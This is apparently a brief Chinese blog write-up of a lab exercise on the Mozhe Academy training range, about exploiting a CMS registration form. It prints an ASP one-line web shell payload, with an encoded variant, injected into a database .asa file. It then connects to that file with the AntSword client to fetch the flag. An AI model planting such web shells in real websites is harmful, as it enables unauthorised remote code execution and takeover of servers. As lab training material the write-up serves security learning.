2021-11-08 墨者学院靶场_CMS系统漏洞分析溯源(第3题) 墨者学院靶场_CMS系统漏洞分析溯源(第3题) 随笔 2021-11-08 15:57 利用是利用成功了,不过有个大问题,利用时所使用的马是怎么编码转换的 目标靶场 解题步骤 充满年代感的首页 进入注册界面 正常填写表单,在密码问题处尝试进行注入 ┼攠數畣整爠煥敵瑳∨≡┩愾 <% execute request("a")%> 访问数据库确认是否写入成功 http http://219.153.49.228:49847/data/ask_newasp.asa 尝试使用蚁剑进行连接 http://219.153.49.228:49847/data/ask_newasp.asa 连接成功,寻找相应Key即可 mmzkyl 2021-11-08 学习笔记 192 阅读 0 评论 2021年11月08日 192 阅读 0 评论